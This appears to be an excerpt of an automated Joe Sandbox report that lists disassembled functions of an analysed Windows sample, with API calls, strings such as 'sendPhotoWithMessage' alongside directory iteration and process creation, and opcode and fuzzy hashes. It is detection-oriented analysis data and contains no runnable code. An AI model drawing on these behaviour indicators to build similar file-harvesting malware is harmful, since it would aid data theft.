Similarity

API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
String ID:
API String ID: 2221425841-0
Opcode ID: a2cf1fa02c6106464e38a00242262be6327711afdd9773003d5641332cd92145
Instruction ID: 26691e1a6dcf12b71b3d0a74dd37dc9125fc9d6bfc589cd1046a015d93071ac4
Opcode Fuzzy Hash: a2cf1fa02c6106464e38a00242262be6327711afdd9773003d5641332cd92145
Instruction Fuzzy Hash: FA51E631F0924389F768AB7D44109BDEBA0AF057A4FC60235CD2E56AF4DE28E4498771

Function 00007FF7ABC0A810 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0A883

Strings

directory_iterator::directory_iterator, xrefs: 00007FF7ABC0A7B8, 00007FF7ABC0AC7D
await sendPhotoWithMessage(, xrefs: 00007FF7ABC0AD02
1, xrefs: 00007FF7ABC0A8AD
status, xrefs: 00007FF7ABC0AC93

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_fs_code_page
String ID: 1$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
API String ID: 1686256323-4148110692
Opcode ID: bcff0d23a5865db57d679a0cc58bae59c6c93d7a4f14a3fd802930c83f765b10
Instruction ID: d25946e8cc09fc7721c241f91eba14101cdf63b1622d882416bd7da50479f866
Opcode Fuzzy Hash: bcff0d23a5865db57d679a0cc58bae59c6c93d7a4f14a3fd802930c83f765b10
Instruction Fuzzy Hash: 53E1C472A19BC181DA60AB29E54076EB361FB85FA0F968231EA9D077F5DF3CD481C710

Function 00007FF7ABC15850 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 130
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF7ABC158E4
GetLastError.KERNEL32 ref: 00007FF7ABC15936
CloseHandle.KERNEL32 ref: 00007FF7ABC159D7
CloseHandle.KERNEL32 ref: 00007FF7ABC159E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15A4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15A53

Strings

Failed to start process. Error: , xrefs: 00007FF7ABC1594D
Process started successfully., xrefs: 00007FF7ABC159FA

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
String ID: Failed to start process. Error: $Process started successfully.
API String ID: 1451358647-594763798
Opcode ID: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
Instruction ID: ec10598c3c21a8f3c2b1e40b838a9bea61550be76658a6ec09e63fe473787a1f
Opcode Fuzzy Hash: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
Instruction Fuzzy Hash: FE51B672E1978182EA00EB68E44466DA361FBC57A4F915336EAAC12AF9DF7CD0C1C710

Function 00007FF7ABC5BA50 Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5BE7D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
Instruction ID: 14e10dc632bf822b19ca944debf8afca232b5015a00b29de66e281a4b265f10c
Opcode Fuzzy Hash: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
Instruction Fuzzy Hash: 2AC1C66294968751E660AF1D9484ABDBF54FB41B80FDB0235EA4E033B6DF7EE8448720

Function 00007FF7ABC15450 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC154BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15737

Part of subcall function 00007FF7ABC04C60: __std_exception_copy.LIBVCRUNTIME ref: 00007FF7ABC04CED

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15758

Strings

directory_iterator::directory_iterator, xrefs: 00007FF7ABC1574B
status, xrefs: 00007FF7ABC15761

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_fs_code_page
String ID: directory_iterator::directory_iterator$status
API String ID: 250480979-2525534277
Opcode ID: 0735d84b42465a8fb63d285e01de44861792c57b748eae9d61833a59fc5eb177
Instruction ID: 93c99ff8b8e8cf2e0749cb8707ecae00d2d6da0cb6dec27945ce729dd088ca60
Opcode Fuzzy Hash: 0735d84b42465a8fb63d285e01de44861792c57b748eae9d61833a59fc5eb177
Instruction Fuzzy Hash: B8A1A172F16B4186EB00EF39D4406ACA361FB84B98F558631DE4D57BB5DF38D5818350

Function 00007FF7ABC491B0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC491DB
CreateThread.KERNEL32 ref: 00007FF7ABC4921C
GetLastError.KERNEL32 ref: 00007FF7ABC4922A
CloseHandle.KERNEL32 ref: 00007FF7ABC49240
FreeLibrary.KERNEL32 ref: 00007FF7ABC4924F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
Instruction ID: 44a128bab01037c82c91361d34951bc715ad0794a5119b2c87003fade3f6bab0
Opcode Fuzzy Hash: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
Instruction Fuzzy Hash: BA21D031A0A7428AEE10FB69A408879F3A1FF89BD0F854531EE4E43775DE7CE6008720

Function 00007FF7ABC58038 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF7ABC58023), ref: 00007FF7ABC58154
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF7ABC58023), ref: 00007FF7ABC581DF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
Instruction ID: feb807d5b0adf0817e7b32f006ff822421ded2bf720782b332325e01fac5b3b9
Opcode Fuzzy Hash: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
Instruction Fuzzy Hash: A6912932B4AA5585F750AF6D88C0A7DAFA0BB44B88F950239DE0E536B5CF3CD581C320

Function 00007FF7ABC26930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC26B69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC26B7B

Strings

ios_base::badbit set, xrefs: 00007FF7ABC26930

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: ios_base::badbit set
API String ID: 73155330-3882152299
Opcode ID: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
Instruction ID: 4302a57df541abd53a9cc31777190de44c60b29b24a69d3150429f2a305e1481
Opcode Fuzzy Hash: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
Instruction Fuzzy Hash: 3651D662B1AB8582ED24EB59E000679A361FB65BD4F918731DEAD037F5DF3CE480C220

Function 00007FF7ABC4D340 Relevance: 4.7, APIs: 3, Instructions: 247COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4D37F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
Instruction ID: 48a26886260bc8df05f52ba9c07788c3fd62391f6d1b436896d54a8631a8f83a
Opcode Fuzzy Hash: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
Instruction Fuzzy Hash: 1F91E372F0771682FF14FA6CD548BB8A2A2AF10758F821535DD0D866B5DF2CFA118360

Function 00007FF7ABC05060 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

__std_fs_directory_iterator_open.LIBCPMT ref: 00007FF7ABC05160
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC05258
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0525E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_directory_iterator_open
String ID:
API String ID: 56456669-0
Opcode ID: 0b41d4647d116bd5198f576b02a13b265af16fad780471928a2ce838859b37be
Instruction ID: ffcca33cbae29336c1ffab5e900d8ed6ed512c11427b89f60f5941bc7ff53346
Opcode Fuzzy Hash: 0b41d4647d116bd5198f576b02a13b265af16fad780471928a2ce838859b37be
Instruction Fuzzy Hash: 4D51D431F1A74642EE60BB1DE094B7DA2A1EF857A0FC14231DA5D076F5DE6CE4808710

Function 00007FF7ABC43098 Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC42B80: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7ABC42B94

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7ABC430BC
__scrt_release_startup_lock.LIBCMT ref: 00007FF7ABC4312A
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7ABC4317D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
Instruction ID: f9769070a281479080a07164e5bf48653dc59d982b706782e467f058bb7025bf
Opcode Fuzzy Hash: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
Instruction Fuzzy Hash: 2E314D21E5B14741FA54BB6C985ABB9D292BFC2344FC74039E91E4B2F3DE2CB6448230

Function 00007FF7ABC490E8 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC570FC: GetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5710B
Part of subcall function 00007FF7ABC570FC: SetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC571AB

CloseHandle.KERNEL32(?,?,?,00007FF7ABC49295,?,?,?,?,00007FF7ABC490D9), ref: 00007FF7ABC49123
FreeLibraryAndExitThread.KERNEL32(?,?,?,00007FF7ABC49295,?,?,?,?,00007FF7ABC490D9), ref: 00007FF7ABC49139
ExitThread.KERNEL32 ref: 00007FF7ABC49142

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: c99bafb6b63b6d6b4a0477b090e1c336143c64e24cabe7b9098992bbbfecb400
Instruction ID: f713c89b8f82506011796c1cd3332bd4f7000702f5caef0e062e661569732e59
Opcode Fuzzy Hash: c99bafb6b63b6d6b4a0477b090e1c336143c64e24cabe7b9098992bbbfecb400
Instruction Fuzzy Hash: ACF0C221A0A68296FF147B38C48CA7CA2A6AF45B34F9A4331C63D022F5CF7CD841C320

Function 00007FF7ABC48704 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7ABC48700), ref: 00007FF7ABC48715
TerminateProcess.KERNEL32(?,?,?,00007FF7ABC48700), ref: 00007FF7ABC48720
ExitProcess.KERNEL32 ref: 00007FF7ABC4872F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
Instruction ID: 464bfe784cb31a57780cf76acead42ca6fcb4631cedb48876c68f0edcc324442
Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
Instruction Fuzzy Hash: 12D09E14F1A60252FB543B7858A99789A526F48752F82143CD81F463B3CD3CA68D8720

Function 00007FF7ABC27870 Relevance: 3.2, APIs: 2, Instructions: 202COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC27B5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC27B67

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
Instruction ID: fdfc310769d868376f472c470eeefce52769969a362d7670f836cffd6e207453
Opcode Fuzzy Hash: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
Instruction Fuzzy Hash: 5E7127A2B0A79581EE10EB19E44577AE355FB85BD0F854536EE8D0BBB6DF3CE4408310

Function 00007FF7ABC4C2C0 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4C304
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4C3FB

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
Instruction ID: d3a0f960040117cefd47eedaa928865a7bda0c7e5be50473100bb531f3621fba
Opcode Fuzzy Hash: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
Instruction Fuzzy Hash: E7511D61B0F64146EB24BA2E9508FBBE292BF44BA4F865730DE6D437F5CE3CD5019620

Function 00007FF7ABC1DD80 Relevance: 3.1, APIs: 2, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
Instruction ID: e9781423421f5ead4220f2bc8ba038f9a8cb6ea49c4448793799338138f7c5d3
Opcode Fuzzy Hash: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
Instruction Fuzzy Hash: 6941B132B06A5585EB51AE2EE400779A7A1FF84FD8F954432CE0D67BB8DE38D8568310

Function 00007FF7ABC492E4 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4930B

Part of subcall function 00007FF7ABC49298: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC492AF

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC493BF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
Instruction ID: e8e29db579aeacac1eb4a621d6cdeabc292b6d6369eee551808a8b7eeede9627
Opcode Fuzzy Hash: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
Instruction Fuzzy Hash: F131E472A1A60245EE50FB5CD4559BDB362EBD6B80FD64231E54E473F2DE7CE2008320

Function 00007FF7ABC61A00 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ABC5388A,?,?,?,00007FF7ABC53C62,?,?,?,?,00007FF7ABC667E8,?,?,?), ref: 00007FF7ABC61A14
FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ABC5388A,?,?,?,00007FF7ABC53C62,?,?,?,?,00007FF7ABC667E8,?,?,?), ref: 00007FF7ABC61A7E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
Instruction ID: 944a820d45924e42f502c3da22b148de1deb8d24ca24a3d030182d2e5262f68b
Opcode Fuzzy Hash: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
Instruction Fuzzy Hash: 3B01CC11F1975541D910BB19641042AA360EF58FE0FC95230DF5D53BFADE2CE4429350

Function 00007FF7ABC5BFC0 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF7ABC5BFAC,?,?,?,?,00000000,00007FF7ABC5C0B5), ref: 00007FF7ABC5C00C
GetLastError.KERNEL32(?,?,?,?,?,00007FF7ABC5BFAC,?,?,?,?,00000000,00007FF7ABC5C0B5), ref: 00007FF7ABC5C016

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
